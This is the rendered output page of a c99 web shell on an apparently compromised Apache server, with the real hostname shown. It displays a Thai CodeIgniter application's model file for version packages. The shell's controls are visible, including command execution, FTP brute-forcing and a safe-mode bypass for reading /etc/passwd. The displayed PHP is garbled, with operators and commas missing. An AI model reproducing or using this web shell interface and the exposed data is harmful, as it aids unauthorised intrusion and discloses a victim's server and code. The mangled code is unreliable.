!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/version_client/application/models/version/   drwxr-xr-x
Free 50.9 GB of 127.8 GB (39.82%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     m_ver_package.php (4.05 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php include_once("da_ver_package.php"); class M_ver_package extends Da_ver_package {     /*      * aOrderBy = array('fieldname' => 'ASC|DESC', ... )      */     function get_all($aOrderBy=""){         $orderBy "";         if ( is_array($aOrderBy) ) {             $orderBy.= "ORDER BY ";              foreach ($aOrderBy as $key => $value) {                 $orderBy.= "$key $value, ";             }             $orderBy substr($orderBy0strlen($orderBy)-2);         }         $sql "SELECT *                  FROM ver_package                  $orderBy";         $query $this->db->query($sql);         return $query;     }          /*      * create array of pk field and value for generate select list in view, must edit PK_FIELD and FIELD_NAME manually      * the first line of select list is '-----เลือก-----' by default.      * if you do not need the first list of select list is '-----เลือก-----', please pass $optional parameter to other values.       * you can delete this function if it not necessary.      */     function get_options($optional='y') {         $qry $this->get_all();         if ($optional=='y'$opt[''] = '-----เลือก-----';         foreach ($qry->result() as $row) {             $opt[$row->PK_FIELD] = $row->FIELD_NAME;         }         return $opt;     }          // add your functions here     function get_pkgByKey($uploadDate$user_id$pkg_status) {         $sql "SELECT *                 FROM ".$this->ver_db.".ver_package                 WHERE pkg_upload_date = ? AND pkg_by = ? AND pkg_status = ?";         $query $this->db->query($sql,array($uploadDate$user_id$pkg_status));         return $query;     }          function updateById($checksum$pkg_status$pkg_id) {         $sql "UPDATE ".$this->ver_db.".ver_package                  SET    pkg_text_en=?, pkg_status=?                 WHERE pkg_id=?";             $this->db->query($sql, array($checksum$pkg_status$pkg_id));         }          function get_lastpkg($sys_id) {         $sql "SELECT Max(pkg_id) as pkg_id FROM ".$this->ver_db.".ver_package                 WHERE pkg_sys_id = ?";         $query $this->db->query($sql, array($sys_id));         return $query;     }          function update_download_status($pkg_download_status$pkg_id){         $sql "UPDATE ".$this->ver_db.".ver_package                  SET    pkg_download_status=?                 WHERE pkg_id=?";             $this->db->query($sql, array($pkg_download_status$pkg_id));         }          function update_upd_status($pkg_update_date$pkg_update_status$pkg_id){         $sql "UPDATE ".$this->ver_db.".ver_package                  SET    pkg_update_date=?, pkg_update_status=?                 WHERE pkg_id=?";             $this->db->query($sql, array($pkg_update_date$pkg_update_status$pkg_id));         }          function get_pkgBySysId($sys_id){         $sql "SELECT *                 FROM ".$this->ver_db.".ver_package                 WHERE pkg_sys_id = ?";         $query $this->db->query($sql,array($sys_id));         return $query;     }          function get_pkgBySysId_2($sys_id){         $sql "SELECT *                 FROM ".$this->ver_db.".ver_package                 LEFT JOIN ".$this->ums_db.".umuser ON UsID = pkg_by                 WHERE pkg_sys_id = ?";         $query $this->db->query($sql,array($sys_id));         return $query;     }          function getSysUpdByAg1($sys_id$fdate$tdate){         $sql "SELECT * FROM ".$this->ver_db.".ver_package                  LEFT JOIN ".$this->ver_db.".ver_client_system ON csys_id  = pkg_sys_id                 WHERE pkg_sys_id = ? AND pkg_download_date BETWEEN ? AND ?";         $query $this->db->query($sql,array($sys_id$fdate$tdate));                 return $query;     }          function getSysUpdByAg2($sys_id$fdate$tdate){         $sql "SELECT * FROM ".$this->ver_db.".ver_package                  LEFT JOIN ".$this->ver_db.".ver_client_system ON csys_id  = pkg_sys_id                 WHERE pkg_sys_id = ? AND pkg_update_date BETWEEN ? AND ?";         $query $this->db->query($sql,array($sys_id$fdate$tdate));                 return $query;     }          function getSysAgByDate1($fdate$tdate){         $sql "SELECT * FROM ".$this->ver_db.".ver_package                  LEFT JOIN ".$this->ver_db.".ver_client_system ON csys_id  = pkg_sys_id                 WHERE pkg_download_date BETWEEN ? AND ?";         $query $this->db->query($sql,array($fdate$tdate));                 return $query;     }          function getSysAgByDate2($fdate$tdate){         $sql "SELECT * FROM ".$this->ver_db.".ver_package                  LEFT JOIN ".$this->ver_db.".ver_client_system ON csys_id  = pkg_sys_id                 WHERE pkg_update_date BETWEEN ? AND ?";         $query $this->db->query($sql,array($fdate$tdate));                 return $query;     } } // end class M_ver_package ?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0129 ]--